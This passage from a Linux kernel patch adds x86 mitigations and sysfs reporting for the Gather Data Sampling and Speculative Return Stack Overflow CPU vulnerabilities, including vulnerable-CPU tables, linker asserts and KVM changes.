++EXPORT_SYMBOL_GPL(gds_ucode_mitigated);
++
++void update_gds_msr(void)
++{
++	u64 mcu_ctrl_after;
++	u64 mcu_ctrl;
++
++	switch (gds_mitigation) {
++	case GDS_MITIGATION_OFF:
++		rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++		mcu_ctrl |= GDS_MITG_DIS;
++		break;
++	case GDS_MITIGATION_FULL_LOCKED:
++		/*
++		 * The LOCKED state comes from the boot CPU. APs might not have
++		 * the same state. Make sure the mitigation is enabled on all
++		 * CPUs.
++		 */
++	case GDS_MITIGATION_FULL:
++		rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++		mcu_ctrl &= ~GDS_MITG_DIS;
++		break;
++	case GDS_MITIGATION_FORCE:
++	case GDS_MITIGATION_UCODE_NEEDED:
++	case GDS_MITIGATION_HYPERVISOR:
++		return;
++	};
++
++	wrmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++
++	/*
++	 * Check to make sure that the WRMSR value was not ignored. Writes to
++	 * GDS_MITG_DIS will be ignored if this processor is locked but the boot
++	 * processor was not.
++	 */
++	rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl_after);
++	WARN_ON_ONCE(mcu_ctrl != mcu_ctrl_after);
++}
++
++static void __init gds_select_mitigation(void)
++{
++	u64 mcu_ctrl;
++
++	if (!boot_cpu_has_bug(X86_BUG_GDS))
++		return;
++
++	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
++		gds_mitigation = GDS_MITIGATION_HYPERVISOR;
++		goto out;
++	}
++
++	if (cpu_mitigations_off())
++		gds_mitigation = GDS_MITIGATION_OFF;
++	/* Will verify below that mitigation _can_ be disabled */
++
++	/* No microcode */
++	if (!(x86_read_arch_cap_msr() & ARCH_CAP_GDS_CTRL)) {
++		if (gds_mitigation == GDS_MITIGATION_FORCE) {
++			/*
++			 * This only needs to be done on the boot CPU so do it
++			 * here rather than in update_gds_msr()
++			 */
++			setup_clear_cpu_cap(X86_FEATURE_AVX);
++			pr_warn("Microcode update needed! Disabling AVX as mitigation.\n");
++		} else {
++			gds_mitigation = GDS_MITIGATION_UCODE_NEEDED;
++		}
++		goto out;
++	}
++
++	/* Microcode has mitigation, use it */
++	if (gds_mitigation == GDS_MITIGATION_FORCE)
++		gds_mitigation = GDS_MITIGATION_FULL;
++
++	rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++	if (mcu_ctrl & GDS_MITG_LOCKED) {
++		if (gds_mitigation == GDS_MITIGATION_OFF)
++			pr_warn("Mitigation locked. Disable failed.\n");
++
++		/*
++		 * The mitigation is selected from the boot CPU. All other CPUs
++		 * _should_ have the same state. If the boot CPU isn't locked
++		 * but others are then update_gds_msr() will WARN() of the state
++		 * mismatch. If the boot CPU is locked update_gds_msr() will
++		 * ensure the other CPUs have the mitigation enabled.
++		 */
++		gds_mitigation = GDS_MITIGATION_FULL_LOCKED;
++	}
++
++	update_gds_msr();
++out:
++	pr_info("%s\n", gds_strings[gds_mitigation]);
++}
++
++static int __init gds_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!boot_cpu_has_bug(X86_BUG_GDS))
++		return 0;
++
++	if (!strcmp(str, "off"))
++		gds_mitigation = GDS_MITIGATION_OFF;
++	else if (!strcmp(str, "force"))
++		gds_mitigation = GDS_MITIGATION_FORCE;
++
++	return 0;
++}
++early_param("gather_data_sampling", gds_parse_cmdline);
++
+ #undef pr_fmt
+ #define pr_fmt(fmt)     "Spectre V1 : " fmt
+ 
+@@ -2207,6 +2308,165 @@ static int __init l1tf_cmdline(char *str)
+ }
+ early_param("l1tf", l1tf_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"Speculative Return Stack Overflow: " fmt
++
++enum srso_mitigation {
++	SRSO_MITIGATION_NONE,
++	SRSO_MITIGATION_MICROCODE,
++	SRSO_MITIGATION_SAFE_RET,
++	SRSO_MITIGATION_IBPB,
++	SRSO_MITIGATION_IBPB_ON_VMEXIT,
++};
++
++enum srso_mitigation_cmd {
++	SRSO_CMD_OFF,
++	SRSO_CMD_MICROCODE,
++	SRSO_CMD_SAFE_RET,
++	SRSO_CMD_IBPB,
++	SRSO_CMD_IBPB_ON_VMEXIT,
++};
++
++static const char * const srso_strings[] = {
++	[SRSO_MITIGATION_NONE]           = "Vulnerable",
++	[SRSO_MITIGATION_MICROCODE]      = "Mitigation: microcode",
++	[SRSO_MITIGATION_SAFE_RET]	 = "Mitigation: safe RET",
++	[SRSO_MITIGATION_IBPB]		 = "Mitigation: IBPB",
++	[SRSO_MITIGATION_IBPB_ON_VMEXIT] = "Mitigation: IBPB on VMEXIT only"
++};
++
++static enum srso_mitigation srso_mitigation __ro_after_init = SRSO_MITIGATION_NONE;
++static enum srso_mitigation_cmd srso_cmd __ro_after_init = SRSO_CMD_SAFE_RET;
++
++static int __init srso_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!strcmp(str, "off"))
++		srso_cmd = SRSO_CMD_OFF;
++	else if (!strcmp(str, "microcode"))
++		srso_cmd = SRSO_CMD_MICROCODE;
++	else if (!strcmp(str, "safe-ret"))
++		srso_cmd = SRSO_CMD_SAFE_RET;
++	else if (!strcmp(str, "ibpb"))
++		srso_cmd = SRSO_CMD_IBPB;
++	else if (!strcmp(str, "ibpb-vmexit"))
++		srso_cmd = SRSO_CMD_IBPB_ON_VMEXIT;
++	else
++		pr_err("Ignoring unknown SRSO option (%s).", str);
++
++	return 0;
++}
++early_param("spec_rstack_overflow", srso_parse_cmdline);
++
++#define SRSO_NOTICE "WARNING: See https://kernel.org/doc/html/latest/admin-guide/hw-vuln/srso.html for mitigation options."
++
++static void __init srso_select_mitigation(void)
++{
++	bool has_microcode;
++
++	if (!boot_cpu_has_bug(X86_BUG_SRSO) || cpu_mitigations_off())
++		goto pred_cmd;
++
++	/*
++	 * The first check is for the kernel running as a guest in order
++	 * for guests to verify whether IBPB is a viable mitigation.
++	 */
++	has_microcode = boot_cpu_has(X86_FEATURE_IBPB_BRTYPE) || cpu_has_ibpb_brtype_microcode();
++	if (!has_microcode) {
++		pr_warn("IBPB-extending microcode not applied!\n");
++		pr_warn(SRSO_NOTICE);
++	} else {
++		/*
++		 * Enable the synthetic (even if in a real CPUID leaf)
++		 * flags for guests.
++		 */
++		setup_force_cpu_cap(X86_FEATURE_IBPB_BRTYPE);
++
++		/*
++		 * Zen1/2 with SMT off aren't vulnerable after the right
++		 * IBPB microcode has been applied.
++		 */
++		if ((boot_cpu_data.x86 < 0x19) &&
++		    (!cpu_smt_possible() || (cpu_smt_control == CPU_SMT_DISABLED)))
++			setup_force_cpu_cap(X86_FEATURE_SRSO_NO);
++	}
++
++	if (retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
++		if (has_microcode) {
++			pr_err("Retbleed IBPB mitigation enabled, using same for SRSO\n");
++			srso_mitigation = SRSO_MITIGATION_IBPB;
++			goto pred_cmd;
++		}
++	}
++
++	switch (srso_cmd) {
++	case SRSO_CMD_OFF:
++		return;
++
++	case SRSO_CMD_MICROCODE:
++		if (has_microcode) {
++			srso_mitigation = SRSO_MITIGATION_MICROCODE;
++			pr_warn(SRSO_NOTICE);
++		}
++		break;
++
++	case SRSO_CMD_SAFE_RET:
++		if (IS_ENABLED(CONFIG_CPU_SRSO)) {
++			/*
++			 * Enable the return thunk for generated code
++			 * like ftrace, static_call, etc.
++			 */
++			setup_force_cpu_cap(X86_FEATURE_RETHUNK);
++
++			if (boot_cpu_data.x86 == 0x19)
++				setup_force_cpu_cap(X86_FEATURE_SRSO_ALIAS);
++			else
++				setup_force_cpu_cap(X86_FEATURE_SRSO);
++			srso_mitigation = SRSO_MITIGATION_SAFE_RET;
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
++			goto pred_cmd;
++		}
++		break;
++
++	case SRSO_CMD_IBPB:
++		if (IS_ENABLED(CONFIG_CPU_IBPB_ENTRY)) {
++			if (has_microcode) {
++				setup_force_cpu_cap(X86_FEATURE_ENTRY_IBPB);
++				srso_mitigation = SRSO_MITIGATION_IBPB;
++			}
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_IBPB_ENTRY.\n");
++			goto pred_cmd;
++		}
++		break;
++
++	case SRSO_CMD_IBPB_ON_VMEXIT:
++		if (IS_ENABLED(CONFIG_CPU_SRSO)) {
++			if (!boot_cpu_has(X86_FEATURE_ENTRY_IBPB) && has_microcode) {
++				setup_force_cpu_cap(X86_FEATURE_IBPB_ON_VMEXIT);
++				srso_mitigation = SRSO_MITIGATION_IBPB_ON_VMEXIT;
++			}
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
++			goto pred_cmd;
++                }
++		break;
++
++	default:
++		break;
++	}
++
++	pr_info("%s%s\n", srso_strings[srso_mitigation], (has_microcode ? "" : ", no microcode"));
++
++pred_cmd:
++	if ((boot_cpu_has(X86_FEATURE_SRSO_NO) || srso_cmd == SRSO_CMD_OFF) &&
++	     boot_cpu_has(X86_FEATURE_SBPB))
++		x86_pred_cmd = PRED_CMD_SBPB;
++}
++
+ #undef pr_fmt
+ #define pr_fmt(fmt) fmt
+ 
+@@ -2405,6 +2665,18 @@ static ssize_t retbleed_show_state(char *buf)
+ 	return sprintf(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
+ }
+ 
++static ssize_t gds_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s\n", gds_strings[gds_mitigation]);
++}
++
++static ssize_t srso_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s%s\n",
++			  srso_strings[srso_mitigation],
++			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
++}
++
+ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr,
+ 			       char *buf, unsigned int bug)
+ {
+@@ -2454,6 +2726,12 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 	case X86_BUG_RETBLEED:
+ 		return retbleed_show_state(buf);
+ 
++	case X86_BUG_GDS:
++		return gds_show_state(buf);
++
++	case X86_BUG_SRSO:
++		return srso_show_state(buf);
++
+ 	default:
+ 		break;
+ 	}
+@@ -2518,4 +2796,14 @@ ssize_t cpu_show_retbleed(struct device *dev, struct device_attribute *attr, cha
+ {
+ 	return cpu_show_common(dev, attr, buf, X86_BUG_RETBLEED);
+ }
++
++ssize_t cpu_show_gds(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_GDS);
++}
++
++ssize_t cpu_show_spec_rstack_overflow(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_SRSO);
++}
+ #endif
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index d298d70f74ce6..d38ae25e7c01f 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -18,11 +18,15 @@
+ #include <linux/init.h>
+ #include <linux/kprobes.h>
+ #include <linux/kgdb.h>
++#include <linux/mem_encrypt.h>
+ #include <linux/smp.h>
++#include <linux/cpu.h>
+ #include <linux/io.h>
+ #include <linux/syscore_ops.h>
+ #include <linux/pgtable.h>
++#include <linux/utsname.h>
+ 
++#include <asm/alternative.h>
+ #include <asm/cmdline.h>
+ #include <asm/stackprotector.h>
+ #include <asm/perf_event.h>
+@@ -58,7 +62,7 @@
+ #include <asm/intel-family.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/uv/uv.h>
+-#include <asm/sigframe.h>
++#include <asm/set_memory.h>
+ #include <asm/traps.h>
+ #include <asm/sev.h>
+ 
+@@ -1072,6 +1076,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
+ 	if (c->extended_cpuid_level >= 0x8000001f)
+ 		c->x86_capability[CPUID_8000_001F_EAX] = cpuid_eax(0x8000001f);
+ 
++	if (c->extended_cpuid_level >= 0x80000021)
++		c->x86_capability[CPUID_8000_0021_EAX] = cpuid_eax(0x80000021);
++
+ 	init_scattered_cpuid_features(c);
+ 	init_speculation_control(c);
+ 
+@@ -1237,6 +1244,10 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ #define RETBLEED	BIT(3)
+ /* CPU is affected by SMT (cross-thread) return predictions */
+ #define SMT_RSB		BIT(4)
++/* CPU is affected by SRSO */
++#define SRSO		BIT(5)
++/* CPU is affected by GDS */
++#define GDS		BIT(6)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1249,27 +1260,30 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_X,	X86_STEPPING_ANY,		MMIO),
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL,	X86_STEPPING_ANY,		SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(CANNONLAKE_L,	X86_STEPPING_ANY,		RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_X,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(COMETLAKE,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO | GDS),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_X,	X86_STEPPING_ANY,		MMIO | GDS),
++	VULNBL_INTEL_STEPPINGS(COMETLAKE,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPINGS(0x0, 0x0),	MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(TIGERLAKE_L,	X86_STEPPING_ANY,		GDS),
++	VULNBL_INTEL_STEPPINGS(TIGERLAKE,	X86_STEPPING_ANY,		GDS),
+ 	VULNBL_INTEL_STEPPINGS(LAKEFIELD,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+-	VULNBL_AMD(0x17, RETBLEED | SMT_RSB),
++	VULNBL_AMD(0x17, RETBLEED | SMT_RSB | SRSO),
+ 	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
++	VULNBL_AMD(0x19, SRSO),
+ 	{}
+ };
+ 
+@@ -1390,6 +1404,21 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
+ 		setup_force_cpu_bug(X86_BUG_SMT_RSB);
+ 
++	/*
++	 * Check if CPU is vulnerable to GDS. If running in a virtual machine on
++	 * an affected processor, the VMM may have disabled the use of GATHER by
++	 * disabling AVX2. The only way to do this in HW is to clear XCR0[2],
++	 * which means that AVX will be disabled.
++	 */
++	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(ia32_cap & ARCH_CAP_GDS_NO) &&
++	    boot_cpu_has(X86_FEATURE_AVX))
++		setup_force_cpu_bug(X86_BUG_GDS);
++
++	if (!cpu_has(c, X86_FEATURE_SRSO_NO)) {
++		if (cpu_matches(cpu_vuln_blacklist, SRSO))
++			setup_force_cpu_bug(X86_BUG_SRSO);
++	}
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+@@ -1571,10 +1600,6 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
+ 
+ 	sld_setup(c);
+ 
+-	fpu__init_system(c);
+-
+-	init_sigframe_size();
+-
+ #ifdef CONFIG_X86_32
+ 	/*
+ 	 * Regardless of whether PCID is enumerated, the SDM says
+@@ -1957,6 +1982,8 @@ void identify_secondary_cpu(struct cpuinfo_x86 *c)
+ 	validate_apic_and_package_id(c);
+ 	x86_spec_ctrl_setup_ap();
+ 	update_srbds_msr();
++	if (boot_cpu_has_bug(X86_BUG_GDS))
++		update_gds_msr();
+ 
+ 	tsx_ap_init();
+ }
+@@ -2290,8 +2317,6 @@ void cpu_init(void)
+ 
+ 	doublefault_init_cpu_tss();
+ 
+-	fpu__init_cpu();
+-
+ 	if (is_uv_system())
+ 		uv_cpu_init();
+ 
+@@ -2307,6 +2332,7 @@ void cpu_init_secondary(void)
+ 	 */
+ 	cpu_init_exception_handling();
+ 	cpu_init();
++	fpu__init_cpu();
+ }
+ #endif
+ 
+@@ -2369,3 +2395,69 @@ void arch_smt_update(void)
+ 	/* Check whether IPI broadcasting can be enabled */
+ 	apic_smt_update();
+ }
++
++void __init arch_cpu_finalize_init(void)
++{
++	identify_boot_cpu();
++
++	/*
++	 * identify_boot_cpu() initialized SMT support information, let the
++	 * core code know.
++	 */
++	cpu_smt_check_topology();
++
++	if (!IS_ENABLED(CONFIG_SMP)) {
++		pr_info("CPU: ");
++		print_cpu_info(&boot_cpu_data);
++	}
++
++	cpu_select_mitigations();
++
++	arch_smt_update();
++
++	if (IS_ENABLED(CONFIG_X86_32)) {
++		/*
++		 * Check whether this is a real i386 which is not longer
++		 * supported and fixup the utsname.
++		 */
++		if (boot_cpu_data.x86 < 4)
++			panic("Kernel requires i486+ for 'invlpg' and other features");
++
++		init_utsname()->machine[1] =
++			'0' + (boot_cpu_data.x86 > 6 ? 6 : boot_cpu_data.x86);
++	}
++
++	/*
++	 * Must be before alternatives because it might set or clear
++	 * feature bits.
++	 */
++	fpu__init_system();
++	fpu__init_cpu();
++
++	alternative_instructions();
++
++	if (IS_ENABLED(CONFIG_X86_64)) {
++		/*
++		 * Make sure the first 2MB area is not mapped by huge pages
++		 * There are typically fixed size MTRRs in there and overlapping
++		 * MTRRs into large pages causes slow downs.
++		 *
++		 * Right now we don't do that with gbpages because there seems
++		 * very little benefit for that case.
++		 */
++		if (!direct_gbpages)
++			set_memory_4k((unsigned long)__va(0), 1);
++	} else {
++		fpu__init_check_bugs();
++	}
++
++	/*
++	 * This needs to be called before any devices perform DMA
++	 * operations that might use the SWIOTLB bounce buffers. It will
++	 * mark the bounce buffers as decrypted so that their usage will
++	 * not cause "plain-text" data to be decrypted when accessed. It
++	 * must be called after late_time_init() so that Hyper-V x86/x64
++	 * hypercalls work when the SWIOTLB bounce buffers are decrypted.
++	 */
++	mem_encrypt_init();
++}
+diff --git a/arch/x86/kernel/cpu/cpu.h b/arch/x86/kernel/cpu/cpu.h
+index 7c9b5893c30ab..d9aeb335002dd 100644
+--- a/arch/x86/kernel/cpu/cpu.h
++++ b/arch/x86/kernel/cpu/cpu.h
+@@ -79,9 +79,11 @@ extern void detect_ht(struct cpuinfo_x86 *c);
+ extern void check_null_seg_clears_base(struct cpuinfo_x86 *c);
+ 
+ unsigned int aperfmperf_get_khz(int cpu);
++void cpu_select_mitigations(void);
+ 
+ extern void x86_spec_ctrl_setup_ap(void);
+ extern void update_srbds_msr(void);
++extern void update_gds_msr(void);
+ 
+ extern u64 x86_read_arch_cap_msr(void);
+ 
+diff --git a/arch/x86/kernel/fpu/init.c b/arch/x86/kernel/fpu/init.c
+index 851eb13edc014..998a08f17e331 100644
+--- a/arch/x86/kernel/fpu/init.c
++++ b/arch/x86/kernel/fpu/init.c
+@@ -53,7 +53,7 @@ void fpu__init_cpu(void)
+ 	fpu__init_cpu_xstate();
+ }
+ 
+-static bool fpu__probe_without_cpuid(void)
++static bool __init fpu__probe_without_cpuid(void)
+ {
+ 	unsigned long cr0;
+ 	u16 fsw, fcw;
+@@ -71,7 +71,7 @@ static bool fpu__probe_without_cpuid(void)
+ 	return fsw == 0 && (fcw & 0x103f) == 0x003f;
+ }
+ 
+-static void fpu__init_system_early_generic(struct cpuinfo_x86 *c)
++static void __init fpu__init_system_early_generic(void)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_CPUID) &&
+ 	    !test_bit(X86_FEATURE_FPU, (unsigned long *)cpu_caps_cleared)) {
+@@ -211,10 +211,10 @@ static void __init fpu__init_system_xstate_size_legacy(void)
+  * Called on the boot CPU once per system bootup, to set up the initial
+  * FPU state that is later cloned into all processes:
+  */
+-void __init fpu__init_system(struct cpuinfo_x86 *c)
++void __init fpu__init_system(void)
+ {
+ 	fpstate_reset(&current->thread.fpu);
+-	fpu__init_system_early_generic(c);
++	fpu__init_system_early_generic();
+ 
+ 	/*
+ 	 * The FPU has to be operational for some of the
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 82c562e2cc982..55ed638cb3fdc 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -724,7 +724,7 @@ badframe:
+ static unsigned long __ro_after_init max_frame_size;
+ static unsigned int __ro_after_init fpu_default_state_size;
+ 
+-void __init init_sigframe_size(void)
++static int __init init_sigframe_size(void)
+ {
+ 	fpu_default_state_size = fpu__get_fpstate_size();
+ 
+@@ -736,7 +736,9 @@ void __init init_sigframe_size(void)
+ 	max_frame_size = round_up(max_frame_size, FRAME_ALIGNMENT);
+ 
+ 	pr_info("max sigframe size: %lu\n", max_frame_size);
++	return 0;
+ }
++early_initcall(init_sigframe_size);
+ 
+ unsigned long get_sigframe_size(void)
+ {
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index 15f29053cec46..fd03f5a1f0ef0 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -133,7 +133,20 @@ SECTIONS
+ 		LOCK_TEXT
+ 		KPROBES_TEXT
+ 		ALIGN_ENTRY_TEXT_BEGIN
++#ifdef CONFIG_CPU_SRSO
++		*(.text.__x86.rethunk_untrain)
++#endif
++
+ 		ENTRY_TEXT
++
++#ifdef CONFIG_CPU_SRSO
++		/*
++		 * See the comment above srso_untrain_ret_alias()'s
++		 * definition.
++		 */
++		. = srso_untrain_ret_alias | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
++		*(.text.__x86.rethunk_safe)
++#endif
+ 		ALIGN_ENTRY_TEXT_END
+ 		SOFTIRQENTRY_TEXT
+ 		STATIC_CALL_TEXT
+@@ -141,13 +154,15 @@ SECTIONS
+ 
+ #ifdef CONFIG_RETPOLINE
+ 		__indirect_thunk_start = .;
+-		*(.text.__x86.*)
++		*(.text.__x86.indirect_thunk)
++		*(.text.__x86.return_thunk)
+ 		__indirect_thunk_end = .;
+ #endif
+ 	} :text =0xcccc
+ 
+ 	/* End of text section, which should occupy whole number of pages */
+ 	_etext = .;
++
+ 	. = ALIGN(PAGE_SIZE);
+ 
+ 	X86_ALIGN_RODATA_BEGIN
+@@ -492,6 +507,21 @@ INIT_PER_CPU(irq_stack_backing_store);
+            "fixed_percpu_data is not at start of per-cpu area");
+ #endif
+ 
++ #ifdef CONFIG_RETHUNK
++. = ASSERT((__ret & 0x3f) == 0, "__ret not cacheline-aligned");
++. = ASSERT((srso_safe_ret & 0x3f) == 0, "srso_safe_ret not cacheline-aligned");
++#endif
++
++#ifdef CONFIG_CPU_SRSO
++/*
++ * GNU ld cannot do XOR so do: (A | B) - (A & B) in order to compute the XOR
++ * of the two function addresses:
++ */
++. = ASSERT(((srso_untrain_ret_alias | srso_safe_ret_alias) -
++		(srso_untrain_ret_alias & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++		"SRSO function pair won't alias");
++#endif
++
+ #endif /* CONFIG_X86_64 */
+ 
+ #ifdef CONFIG_KEXEC_CORE
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 6047dbe048803..7b4224f5ee2de 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -736,6 +736,9 @@ void kvm_set_cpu_caps(void)
+ 		F(PMM) | F(PMM_EN)
+ 	);
+ 
++	if (cpu_feature_enabled(X86_FEATURE_SRSO_NO))
++		kvm_cpu_cap_set(X86_FEATURE_SRSO_NO);
++
+ 	/*
+ 	 * Hide RDTSCP and RDPID if either feature is reported as supported but
+ 	 * probing MSR_TSC_AUX failed.  This is purely a sanity check and
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index a19d473d01847..7eeade35a425b 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -48,6 +48,7 @@ static const struct cpuid_reg reverse_cpuid[] = {
+ 	[CPUID_7_1_EAX]       = {         7, 1, CPUID_EAX},
+ 	[CPUID_12_EAX]        = {0x00000012, 0, CPUID_EAX},
+ 	[CPUID_8000_001F_EAX] = {0x8000001f, 0, CPUID_EAX},
++	[CPUID_8000_0021_EAX] = {0x80000021, 0, CPUID_EAX},
+ };
+ 
+ /*
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 0a212fe2cd398..fdb6007f2eb86 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1485,7 +1485,9 @@ static void svm_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ 	if (sd->current_vmcb != svm->vmcb) {
+ 		sd->current_vmcb = svm->vmcb;
+-		indirect_branch_prediction_barrier();
++
++		if (!cpu_feature_enabled(X86_FEATURE_IBPB_ON_VMEXIT))
++			indirect_branch_prediction_barrier();
+ 	}
+ 	if (kvm_vcpu_apicv_active(vcpu))
+ 		avic_vcpu_load(vcpu, cpu);
+diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S
+index 34367dc203f21..5be9a63f09fff 100644
+--- a/arch/x86/kvm/svm/vmenter.S
++++ b/arch/x86/kvm/svm/vmenter.S
+@@ -223,6 +223,9 @@ SYM_FUNC_START(__svm_vcpu_run)
+ 	 */
+ 	UNTRAIN_RET
+ 
++	/* SRSO */
++	ALTERNATIVE "", "call entry_ibpb", X86_FEATURE_IBPB_ON_VMEXIT
++
+ 	/*
+ 	 * Clear all general purpose registers except RSP and RAX to prevent
+ 	 * speculative use of the guest's values, even those that are reloaded
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 32f589b96d997..f4b12c3c30a01 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -311,6 +311,8 @@ u64 __read_mostly host_xcr0;
+ 
+ static struct kmem_cache *x86_emulator_cache;
+ 
++extern bool gds_ucode_mitigated(void);
++
+ /*
+  * When called, it means the previous get/set msr reached an invalid msr.
+  * Return true if we want to ignore/silent this failed msr access.
+@@ -1613,7 +1615,7 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_SKIP_VMENTRY_L1DFLUSH | ARCH_CAP_SSB_NO | ARCH_CAP_MDS_NO | \
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+-	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO)
